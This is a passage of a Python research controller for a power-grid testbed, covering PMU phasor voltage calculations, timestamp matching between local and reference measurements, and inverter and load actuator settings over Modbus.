= self.network_kVAbase/self.localSratio #self.localkVAbase takes into account self.localSratio here\n self.localIbase = self.localkVAbase/self.localkVbase\n print('kVbase bus ' + str(self.busId) + ' : ' + str(self.kVbase))\n print('network_kVAbase bus ' + str(self.busId) + ' : ' + str(self.network_kVAbase))\n print('self.localSratio : ' + str(self.localSratio))\n print('self.localkVAbase : ' + str(self.localkVAbase))\n print('self.localkVbase : ' + str(self.localkVbase))\n\n # self.plug_to_phase_map = plug_to_phase_map #3-entry vector that maps PMU channels to the true phases (SPBC commands should be given in terms of the true phases)\n self.plug_to_phase_idx = plug_to_phase_idx\n self.plug_to_V_idx = [0] * nphases #maps the plugs (ordered L1 L2 L3) of the PMU to the entries of the V (or I) vectors such that the order is always A then B then C (when each phase is available)\n #if 2 or 3 phase do below: (if its single phase you can just leave it)\n if nphases > 1:\n if 'A' in self.plug_to_phase_idx[:nphases]: #takes care of the 3-phase, and 2 of the 3 2-phase scenarios # dont the :nphases if plug_to_phase_map is 3-long\n for i, phase in enumerate(self.plug_to_phase_idx[:nphases]): #[:nphases] gives the first nphases values (so it takes care of the cases when current measurements are included as well)\n if phase == 'A':\n self.plug_to_V_idx[i] = 0 #eg if L2 maps to A then then second entry of self.plug_to_V_idx will be 0\n if phase == 'B':\n self.plug_to_V_idx[i] = 1\n if phase == 'C':\n self.plug_to_V_idx[i] = 2 - (3 - nphases) #writes a 1 if just A and C\n else:\n for i, phase in enumerate(self.plug_to_phase_idx[:nphases]): #takes care of the case when just B and C phases are present\n if phase == 'B':\n self.plug_to_V_idx[i] = 0\n if phase == 'C':\n self.plug_to_V_idx[i] = 1\n\n #current measurements\n self.Iang_relative = 'initialize'\n self.Iang_notRelative = 
'initialize'\n self.Imag = np.zeros(nphases)\n self.Icomp_est = np.zeros(nphases,dtype=np.complex_)\n self.Icomp_pu_est = np.zeros(nphases,dtype=np.complex_)\n self.Icomp = np.zeros(nphases,dtype=np.complex_)\n self.Icomp_pu = np.zeros(nphases,dtype=np.complex_)\n\n #saturation variables\n self.sat_arrayP = np.ones(nphases) #logic vectors which are 1 if a given phase is not saturated, and zero if it is\n self.sat_arrayQ = np.ones(nphases) #if no current measurements, then these will just stay zero and saturated == 0\n self.Pmax_pu = np.asarray([np.NaN] * nphases) #this signal is used by the SPBC if ICDI is true, otherwise its a nan\n self.Qmax_pu = np.asarray([np.NaN] * nphases)\n self.saturationCounterLimit = 5\n self.Psat = np.ones((nphases, self.saturationCounterLimit)) #set of sat_arrayPs\n self.Qsat = np.ones((nphases, self.saturationCounterLimit))\n self.ICDI_sigP = np.zeros((nphases, 1), dtype=bool) #I Cant Do It signal, defaulted to zero (that it can do it)\n self.ICDI_sigQ = np.zeros((nphases, 1), dtype=bool)\n\n #phasor calc\n self.local_time_index = [np.NaN]*nphases\n self.ref_time_index = [np.NaN]*nphases\n\n self.nPhasorReadings = 120 #120 is 1 seconds-worth of 120 hz measurements # number of time measurements that phasorV_calc looks into the past to find a match\n # important for this to be << than the actuation rate (period), since the phasor commands dont occur instantaneously\n self.pmuTimeWindow = 2000000 #in ns, 2000000 is 2 ms #allowable time window for phasor measurements to be considered concurrent\n\n # https config\n #these are the actuators (inverters) that are controlled by a given lpbc. inverters are counted off 1,2,3, loads are counted off 0,1,2\n self.act_idxs = np.asarray(act_idxs)\n #'inverter' or 'load'\n if self.actType == 'inverter':\n self.act_idxs = self.act_idxs + 1 #inverters indexed starting with 1 not 0\n\n #Flexlab specific commands\n self.currentMeasExists = currentMeasExists\n self.loadrackPlimit = 2000. #size of a load rack in VA\n self.loadrack_manuallimit = 1500.\n self.batt_max = 3300.\n self.inv_s_max = 7600. * 0.90 # 0.97 comes from the fact that we are limiting our inverter max to 97% of its true max to prevent issues with running inverter at full power\n self.inv_s_max_commands = 8350.\n self.mode = 1 #How we control inverters mode 1: PV as disturbance, mode 2: PV calculated, mode 3: PV only\n self.batt_cmd = np.zeros(nphases) #battery commands are given in watts\n self.invPperc_ctrl = np.zeros(nphases) #inverter P commnads are given as a percentage of inv_s_max\n self.load_cmd = np.zeros(nphases) #load commands are given in watts\n self.P_PV = np.zeros(nphases)\n self.pf_ctrl = np.ones(nphases)\n # self.flexgrid = Flexgrid_API(inv_ids=[1, 2, 3], portNames=['COM3'], baudrate=115200, parallel=False, safety=True,\n # debug=False, ComClient=ModbusRTUClient)\n self.inv_Pmax = 7000 #check with Maxime\n self.inv_Qmax = 5000 #check with Maxime\n self.offset_mode = 2 # set to 1 for remainder offset, 2 for percentage offset, 0 for no offset\n\n IP = '131.243.41.14'\n PORT = 504\n self.client = ModbusClient(IP, port=PORT)\n\n self.VmagScaling = VmagScaling #this is a hack to get flexlab to work. 
default to 1\n\n #vars for plots\n self.controlStepsTaken_counter = 0\n self.testcase = cfg['testcase']\n self.saveVmagandangPlot = 1\n self.saveZesterrorPlot = 1\n # self.HistLength = 101\n # self.HistLength = 10\n self.HistLength = 3\n self.VmagHist = np.zeros((self.nphases,self.HistLength))\n self.VangHist = np.zeros((self.nphases,self.HistLength))\n self.ZeffkErrorHist = np.zeros(self.HistLength)\n self.GtMagHist = np.zeros(self.HistLength)\n\n self.P_implemented_PU = None #to account for commands hitting the upper limits of an actuator\n self.Q_implemented_PU = None\n\n self.AveragePhasorMeasurements = 1 # =1: Take the average phasor meas, =0: take the most recent\n\n\n def phasorV_localMeas(self, local_phasors, nphases, plug_to_V_idx):\n '''\n This only works if the network is at the same frequency for which the phasors are defined\n '''\n # Initialize\n #ordered_local is the PMU meas data sets from the local PMU. First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n flag = [1] * nphases #used to check if a delta angle was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n\n Vmag = np.asarray([np.NaN]*nphases)\n Vang = np.asarray([np.NaN]*nphases)\n Vfreq = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VangSum = np.zeros(nphases)\n VfreqSum = np.zeros(nphases)\n\n VmagCount = np.zeros(nphases)\n VangCount = np.zeros(nphases)\n VfreqCount = np.zeros(nphases)\n\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n\n Vangi = local_packet['angle']\n if Vangi is None:\n print('Vangi is None')\n elif np.isnan(Vangi):\n print('Vangi is NaN')\n elif Vangi == 0:\n print('Vangi is 0')\n else:\n Vangi = np.radians(Vangi)\n VangSum[phase] += self.PhasorV_ang_wraparound(Vangi, nphases=1, nameVang='Vangi')\n VangCount[phase] += 1\n # flag[phase] = 0\n\n Vfreqi = local_packet['freq']\n if Vfreqi is None or np.isnan(Vfreqi):\n print('Vfreqi is Not good')\n else:\n VfreqSum[phase] += Vfreqi\n VfreqCount[phase] += 1\n\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n Vang[phase] = VangSum[phase]/VangCount[phase]\n Vfreq[phase] = VfreqSum[phase]/VfreqCount[phase]\n\n # if flag[phase] == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n if all(abs(Vfreq - self.nomFreq) < self.freqTol): #HEREE\n deltaVangReliable = 1 #this isnt necessarily true, eg there could have been a frequency excursion before the data 
window started\n else:\n deltaVangReliable = 0\n print(';;;;;;;;;;;;;;!!!!!!!! deltaVangReliable not reliable bc Vfreq = ', Vfreq)\n print('self.freqTol ', self.freqTol)\n\n print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. often it is 120*rate (number of seconds)\n\n print('VmagCount ', VmagCount)\n print('Vmag ', Vmag)\n\n print('VangCount ', VangCount)\n print('Vang ', Vang)\n\n print('Vfreq ', Vfreq)\n print('deltaVangReliable ', deltaVangReliable)\n print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n\n return Vang, Vmag, dataWindowLength, deltaVangReliable\n\n\n # def phasorV_localMeas(self, local_phasors, nphases, plug_to_V_idx):\n # '''\n # This isnt going to work because the delta angle needs to be between before the change in actuation and after the change in actuation (CIA).\n # Its possible to do it with screens to find when the CIA happened, then take the phasor before the CIA and find a phasor for after the jump\n # Finding a phasor for after the CIA could be a single phasor after the jump, or an average of phasors after the jump.\n # The phasors after the jump have to take into account the accumulated affect of the off-nominal frequency\n # '''\n # # Initialize\n # #ordered_local is the PMU meas data sets from the local PMU. First dim is phase, second is dataWindowLength.\n # # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # flag = [1] * nphases #used to check if a delta angle was found\n # Vmeas_all_phases = 1\n # # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n # for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n # if len(local_phasors[plug]) > self.nPhasorReadings:\n # dataWindowLength = self.nPhasorReadings\n # else:\n # dataWindowLength = len(local_phasors[plug])\n # phase_idx = plug_to_V_idx[plug]\n # ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n #\n # Vmag = np.asarray([np.NaN]*nphases)\n # deltaVang_compensated = np.asarray([np.NaN]*nphases)\n # deltaVang_uncompensated = np.asarray([np.NaN]*nphases)\n #\n # VmagSum = np.zeros(nphases)\n # VmagCount = np.zeros(nphases)\n # deltaVangCount = np.zeros(nphases)\n # deltaVang_compensated_Sum = np.zeros(nphases)\n # deltaVang_uncompensated_Sum = np.zeros(nphases)\n #\n # # first = [1] * nphases #used to init delta_Vang calc\n # VangPrev = [None] * nphases\n #\n # for phase in range(nphases):\n # # loops through every ordered_local uPMU reading\n # for local_packet in ordered_local[phase]:\n # Vmagi = local_packet['magnitude']\n # Vmagi = Vmagi * self.VmagScaling\n # if Vmagi is None:\n # print('Vmagi is None')\n # elif np.isnan(Vmagi):\n # print('Vmagi is NaN')\n # elif Vmagi == 0:\n # print('Vmagi is 0')\n # else:\n # VmagSum[phase] += Vmagi\n # VmagCount[phase] += 1\n #\n # Vangi = local_packet['angle']\n # Vfreqi = local_packet['freq']\n # if VangPrev[phase] is None:\n # print(f'VangPrev[{phase}] was None')\n # VangPrev[phase] = Vangi\n # print(f'VangPrev[{phase}] is {VangPrev[phase]} now')\n # else:\n # deltaVangCount += 1\n # 
deltaVangi_freqCompensation = (Vfreqi/self.nomFreq - 1)*2*np.pi/(self.measurementFreq/self.nomFreq)\n # deltaVangi_compensated = Vangi - deltaVangi_freqCompensation - VangPrev[phase] #HEREE\n # deltaVangi_compensated = self.PhasorV_ang_wraparound(deltaVangi_compensated, nphases=1, nameVang='deltaVangi_compensated')\n # deltaVang_compensated_Sum[phase] += deltaVangi_compensated\n # deltaVangi_uncompensated = Vangi - VangPrev[phase]\n # deltaVangi_uncompensated = self.PhasorV_ang_wraparound(deltaVangi_uncompensated, nphases=1, nameVang='deltaVangi_uncompensated')\n # deltaVang_uncompensated_Sum[phase] += deltaVangi_uncompensated\n # flag[phase] = 0\n #\n # Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n #\n # if flag[phase] == 1:\n # print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n # Vmeas_all_phases = 0\n # else:\n # deltaVang_compensated[phase] = deltaVang_compensated_Sum[phase]/deltaVangCount[phase]\n # deltaVang_uncompensated[phase] = deltaVang_uncompensated_Sum[phase]/deltaVangCount[phase]\n #\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n # print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. often it is 120*rate (number of seconds)\n #\n # print('VmagCount ', VmagCount)\n # print('Vmag ', Vmag)\n #\n # print('deltaVangCount ', deltaVangCount)\n # print('deltaVang_compensated ', deltaVang_compensated)\n # print('deltaVang_uncompensated ', deltaVang_uncompensated)\n #\n # print('Vfreqi ', Vfreqi) #may want to print these for more timesteps or each phase if something is weird\n # print('deltaVangi_freqCompensation ', deltaVangi_freqCompensation)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n #\n # return deltaVang_compensated, deltaVang_uncompensated, Vmag, dataWindowLength, Vmeas_all_phases\n\n '''\n Think this is how the PMUs send data:\n Each PMU measurement comes with a time stamp and an angle measurement.\n The timestamps have to be aligned before the angle difference is taken\n The angle measurement that comes from the PMU has an arbitrary refernce. To get meaningful angle measurements, you have to decide on a reference.\n (Still deciding whether the arbitrary is the first phase for a given controller. Could make it always phase A, but reference_phasors would always have to contain phase A.)\n V_ang_ref_firstPhase is special because it is chosen as angle = 0, and subtracted (sometimes implicitly) from all other angles.\n self.Vang_with120degshifts is named poorly (by me), just means that V_ang_ref_firstPhase is subtracted, rather than V_ang_ref[phase], so the angles will be relative to [0,0,0] rather than [0,-120,120]\n '''\n '''\n HERE\n create buffers for local and ref phasor measurements that have n_buffer measurements in them:\n self.ref_local_buffer\n each time a new meas comes in, you delete the oldest phasor measurements from the buffer and put in the newest phasor measurements\n for each new local measurement, you check all the meassurements in self.ref_local_buffer, rather than just in ref_local.\n Actually, it should be the other way around bc the ref measurements are the ones that are going to be delayed. 
So instead there should be:\n self.ordered_local_buffer\n Each time a ref measurement comes in, all of the measurements in self.ordered_local_buffer are checked for time-matches\n (This will require switching the order of the for loops in phasorV_calc)\n (Same would have to be implemented in phasorI_calc)\n '''
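\n # --- Illustrative sketch (not part of the original control flow, never called): one way to implement the rolling measurement buffer described in the note above, using collections.deque. The names (packets, n_buffer) are hypothetical; a deque with maxlen automatically discards the oldest entries as new phasor packets arrive.\n @staticmethod\n def _example_rolling_buffer(packets, n_buffer=120):\n        from collections import deque #local import so the sketch is self-contained\n        buf = deque(maxlen=n_buffer) #holds at most the n_buffer newest phasor packets\n        for packet in packets: #appending past maxlen silently drops the oldest packet\n            buf.append(packet)\n        return list(buf) #the newest n_buffer packets, oldest first\n
\n def phasorV_calc(self, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n # Initialize\n #ordered_local and ref are the PMU meas data sets from the local and ref PMUs, respectively. First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [None] * nphases\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases\n flag = [1] * nphases #used to check if a phasor match was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed to be in A,B,C order)\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n
\n Vmag = np.asarray([np.NaN]*nphases)\n VmagRef = np.asarray([np.NaN]*nphases)\n Vmag_relative = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VmagCount = np.zeros(nphases)\n VmagRefSum = np.zeros(nphases)\n VmagRefCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n for ref_packet in ref[phase]:\n VmagRefi = ref_packet['magnitude']\n VmagRefi = VmagRefi * self.VmagScaling\n if VmagRefi is None:\n print('VmagRefi is None')\n elif np.isnan(VmagRefi):\n print('VmagRefi is NaN')\n elif VmagRefi == 0:\n print('VmagRefi is 0')\n else:\n VmagRefSum[phase] += VmagRefi\n VmagRefCount[phase] += 1\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n VmagRef[phase] = VmagRefSum[phase]/VmagRefCount[phase]\n Vmag_relative[phase] = Vmag[phase] - VmagRef[phase]\n\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n print('len(local_phasors[plug]) ', len(local_phasors[plug])) #this is the number of phasor measurements delivered. 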
often it is 120*rate (number of seconds)\n print('len(reference_phasors[plug]) ', len(reference_phasors[plug]))\n #\n # print('ordered_local[0][0][time] - ordered_local[0][-1][time] ', int(ordered_local[0][0]['time']) - int(ordered_local[0][-1]['time']))\n # print('ref[0][0][time] - ref[0][-1][time] ', int(ref[0][0]['time']) - int(ref[0][-1]['time']))\n\n print('VmagCount ', VmagCount)\n # print('VmagRefCount ', VmagRefCount)\n # print('Vmag ', Vmag)\n # print('VmagRef ', VmagRef)\n # print('Vmag_relative ', Vmag_relative)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n\n Vang_with120degshifts = np.asarray([np.NaN]*nphases)\n Vang_without120degshifts = np.asarray([np.NaN]*nphases)\n VangRef = np.asarray([np.NaN]*nphases)\n # V_ang_ref_firstPhase = [np.NaN]\n V_ang_ref_firstPhase = np.asarray([np.NaN]*nphases) #using nphase-long version for back-compatibility, they should all be the same\n\n VangCount = np.zeros(nphases)\n Vang_with120degshifts_Sum = np.zeros(nphases)\n # Vang_with120degshifts_Count = np.zeros(nphases)\n Vang_without120degshifts_Sum = np.zeros(nphases)\n # Vang_without120degshifts_Count = np.zeros(nphases)\n VangRef_Sum = np.zeros(nphases)\n # VangRefCount = np.zeros(nphases)\n V_ang_ref_firstPhase_Sum = np.zeros(nphases)\n # V_ang_ref_firstPhaseCount = np.zeros(nphases)\n\n #5/28/20 sets the first phase as the local base angle timestamp even if this phase is B or C\n #this is okay bc the local controller can just use 0 for its first angle (locally), even if that angle is phase is B or C\n #important thing is that the other notRelative angles are seperated by ~120degrees\n for phase in range(nphases):\n refAngleUsedVec = np.zeros(dataWindowLength) # debug to check if any refs are used twice (they shouldnt be)\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]): #doesnt need ot be reversed when using averaging (as done now), but doesnt hurt\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n i = 0\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n V_ang_ref_firstPhaseTemp = ref[0][ref_time_index[phase]]['angle']\n #dont think you actually need/want PhasorV_ang_wraparound_1d\n # V_ang_local = self.PhasorV_ang_wraparound_1d(ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift)\n # V_ang_ref = self.PhasorV_ang_wraparound_1d(ref[phase][ref_time_index[phase]]['angle'])\n # V_ang_ref_firstPhaseTemp = self.PhasorV_ang_wraparound_1d(ref[0][ref_time_index[phase]]['angle'])\n\n # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n # if V_ang_ref_firstPhase == np.NaN or V_ang_ref_firstPhase == None: #(could put in a better 
check here, eg is the angle in a reasonable range)\n V_ang_ref_firstPhase_Sum[phase] += V_ang_ref_firstPhaseTemp #because each phase (of the current meas) needs a V_ang_ref_firstPhase\n if V_ang_ref_firstPhaseTemp is None or np.isnan(V_ang_ref_firstPhaseTemp): #was '== np.NaN or == None', which never triggers; (could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n
\n Vang_without120degshifts_Sum[phase] += np.radians(V_ang_local - V_ang_ref)\n Vang_with120degshifts_Sum[phase] += np.radians(V_ang_local - V_ang_ref_firstPhaseTemp)\n VangRef_Sum[phase] += np.radians(V_ang_ref - V_ang_ref_firstPhaseTemp)\n VangCount[phase] += 1\n if refAngleUsedVec[i] == 1 and phase == 0: #debug\n print(f'WARNING, this ref angle {i} was already used')\n refAngleUsedVec[i] = 1\n\n flag[phase] = 0\n #for debugging\n # if phase == 0:\n # print('i used ', i)\n # print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n # break # dont want this break when doing averaging\n\n i += 1\n # if flag[phase] == 0:\n # break\n if flag[phase] == 1:\n print('No timestamp found bus ' + str(self.busId) + ' phase ' + str(phase))\n Vmeas_all_phases = 0\n else:\n Vang_with120degshifts[phase] = Vang_with120degshifts_Sum[phase]/VangCount[phase]\n Vang_without120degshifts[phase] = Vang_without120degshifts_Sum[phase]/VangCount[phase]\n VangRef[phase] = VangRef_Sum[phase]/VangCount[phase]\n V_ang_ref_firstPhase[phase] = V_ang_ref_firstPhase_Sum[phase]/VangCount[phase]\n
\n # print('Vang_with120degshifts ', Vang_with120degshifts)\n # print('Vang_without120degshifts ', Vang_without120degshifts)\n # print('VangRef ', VangRef)\n # print('V_ang_ref_firstPhase ', V_ang_ref_firstPhase)\n print('VangCount ', VangCount)\n # print('::::::::::::::::::::::::::::::::::::::::::::::::::::::::')\n return (Vang_with120degshifts,VangRef,Vang_without120degshifts,Vmag,VmagRef,Vmag_relative, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) #returns the self. variables bc in case a match isnt found, they're already initialized
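\n\n # --- Illustrative sketch (not part of the original control flow, never called): the core timestamp-matching idea used in phasorV_calc above, reduced to two packet lists. Packets are assumed to be dicts with an integer-castable 'time' field (the uPMU packet format used above); time_window plays the role of self.pmuTimeWindow.\n @staticmethod\n def _example_match_timestamps(local_packets, ref_packets, time_window):\n        matches = []\n        for local_packet in reversed(local_packets): #newest local packet first\n            local_time = int(local_packet['time'])\n            for ref_packet in reversed(ref_packets): #newest ref packet first\n                if abs(int(ref_packet['time']) - local_time) <= time_window:\n                    matches.append((local_packet, ref_packet)) #a local/ref pair close enough in time to compare\n                    break #at most one ref match per local packet\n        return matches\n
\n # older version that didnt take average\n def old_phasorV_calc(self, local_phasors, reference_phasors, nphases, plug_to_V_idx):\n # Initialize\n #ordered_local and ref are the PMU meas data sets from the local and ref PMUs, respectively. 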
First dim is phase, second is dataWindowLength.\n # ordered_local = [None] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n # ref = [None] * nphases\n ordered_local = [0] * nphases # makes a list nphases-long, similar to np.zeros(nphases), but a list\n ref = [0] * nphases\n flag = [1] * nphases #used to check if a phasor match was found\n Vmeas_all_phases = 1\n # Extract latest nPhasorReadings readings from local and ref uPMUs, and put local in phase-order (ref is assumed to be in phase-order)\n for plug in range(nphases): #this will just read the voltage measurements cause its nphases long, even if local_phasors also has current measurements\n if len(local_phasors[plug]) > self.nPhasorReadings:\n dataWindowLength = self.nPhasorReadings\n else:\n dataWindowLength = len(local_phasors[plug])\n phase_idx = plug_to_V_idx[plug]\n ordered_local[phase_idx] = local_phasors[plug][-dataWindowLength:] #this orders local in A,B,C phase order (ref is assumed ot be in A,B,C order)\n ref[plug] = reference_phasors[plug][-dataWindowLength:] #from dataWindowLength back to present, puts Lx2 entries in each entry of local, x2 is for magnitude and phase\n #HERE small chance theres a problem here w copying a mutable data type and not using .copy()\n\n #this was creating issues when intitial phasor reading wasnt correct\n # if self.Vang_without120degshifts == 'initialize':\n # self.Vang_without120degshifts = np.zeros(nphases)\n # # loops through every phase with actuation\n # for phase in range(nphases): #phases descrived by a,b,c ordering, but not necessarily a,b,c, all angles are base zero (ie not base -2pi/3 for phase B) bec they are relative angles\n # # Initialize: Extract measurements from most recent timestamps only for first iteration\n # V_mag_local = ordered_local[phase][-1]['magnitude']\n # V_ang_local = ordered_local[phase][-1]['angle'] - self.ametek_phase_shift\n # V_mag_ref = ref[phase][-1]['magnitude']\n # V_ang_ref = ref[phase][-1]['angle']\n # self.Vang_without120degshifts[phase] = np.radians(V_ang_local - V_ang_ref)\n # self.Vmag[phase] = V_mag_local\n # self.VmagRef[phase] = V_mag_ref\n # self.Vmag_relative[phase] = V_mag_local - V_mag_ref\n\n Vmag = np.asarray([np.NaN]*nphases)\n VmagRef = np.asarray([np.NaN]*nphases)\n Vmag_relative = np.asarray([np.NaN]*nphases)\n\n VmagSum = np.zeros(nphases)\n VmagCount = np.zeros(nphases)\n VmagRefSum = np.zeros(nphases)\n VmagRefCount = np.zeros(nphases)\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading\n for local_packet in ordered_local[phase]:\n Vmagi = local_packet['magnitude']\n Vmagi = Vmagi * self.VmagScaling\n if Vmagi is None:\n print('Vmagi is None')\n elif np.isnan(Vmagi):\n print('Vmagi is NaN')\n elif Vmagi == 0:\n print('Vmagi is 0')\n else:\n VmagSum[phase] += Vmagi\n VmagCount[phase] += 1\n for ref_packet in ref[phase]:\n VmagRefi = ref_packet['magnitude']\n VmagRefi = VmagRefi * self.VmagScaling\n if VmagRefi is None:\n print('VmagRefi is None')\n elif np.isnan(VmagRefi):\n print('VmagRefi is NaN')\n elif VmagRefi == 0:\n print('VmagRefi is 0')\n else:\n VmagRefSum[phase] += VmagRefi\n VmagRefCount[phase] += 1\n Vmag[phase] = VmagSum[phase]/VmagCount[phase]\n VmagRef[phase] = VmagRefSum[phase]/VmagRefCount[phase]\n Vmag_relative[phase] = Vmag[phase] - VmagRef[phase]\n\n # loops through each set of voltage measurements for each phase\n local_time_index = [np.NaN]*nphases\n ref_time_index = [np.NaN]*nphases\n #below isnt needed if you switch back to using self. 
values\n Vang_with120degshifts = np.asarray([np.NaN]*nphases)\n VangRef = np.asarray([np.NaN]*nphases)\n Vang_without120degshifts = np.asarray([np.NaN]*nphases)\n # Vmag = np.asarray([np.NaN]*nphases)\n # VmagRef = np.asarray([np.NaN]*nphases)\n # Vmag_relative = np.asarray([np.NaN]*nphases)\n\n # V_ang_ref_firstPhase = [np.NaN]\n V_ang_ref_firstPhase = [np.NaN]*nphases #using this for back-compatibility\n
\n #5/28/20 sets the first phase as the local base angle timestamp even if this phase is B or C\n #this is okay bc the local controller can just use 0 for its first angle (locally), even if that angle is for phase B or C\n #important thing is that the other notRelative angles are separated by ~120degrees\n for phase in range(nphases):\n # loops through every ordered_local uPMU reading starting from most recent\n for local_packet in reversed(ordered_local[phase]):\n # extract most recent ordered_local uPMU reading\n local_time = int(local_packet['time'])\n # loops though every reference uPMU reading starting from most recent\n for ref_packet in reversed(ref[phase]):\n ref_time = int(ref_packet['time'])\n\n #print(f'ref,local,diff: {ref_time},{local_time},{(ref_time-local_time)/1e6}')\n
\n # check timestamps of ordered_local and reference uPMU if within 2 ms\n if abs(ref_time - local_time) <= self.pmuTimeWindow:\n local_time_index[phase] = ordered_local[phase].index(local_packet) #saves and returns these so the current measurement can use the measurements from the same timestamps\n ref_time_index[phase] = ref[phase].index(ref_packet)\n # Extract measurements from closest timestamps\n # V_mag_local = ordered_local[phase][local_time_index[phase]]['magnitude']\n # V_mag_ref = ref[phase][ref_time_index[phase]]['magnitude']\n # Vmag[phase] = V_mag_local\n # VmagRef[phase] = V_mag_ref\n # Vmag_relative[phase] = V_mag_local - V_mag_ref\n
\n V_ang_local = ordered_local[phase][local_time_index[phase]]['angle'] - self.ametek_phase_shift\n V_ang_ref = ref[phase][ref_time_index[phase]]['angle']\n # V_ang_ref_firstPhase = ref[0][ref_time_index[phase]]['angle'] #this can be thought of as the local base angle timestamp\n V_ang_ref_firstPhase[phase] = ref[0][ref_time_index[phase]]['angle'] #because each phase (of the current meas) needs a V_ang_ref_firstPhase\n if V_ang_ref_firstPhase[phase] is None or np.isnan(V_ang_ref_firstPhase[phase]): #was '== np.NaN or == None', which never triggers; (could put in a better check here, eg is the angle in a reasonable range)\n print('WARNING: issue getting a nonRelative voltage angle. This will mess up the LQR controller.')\n
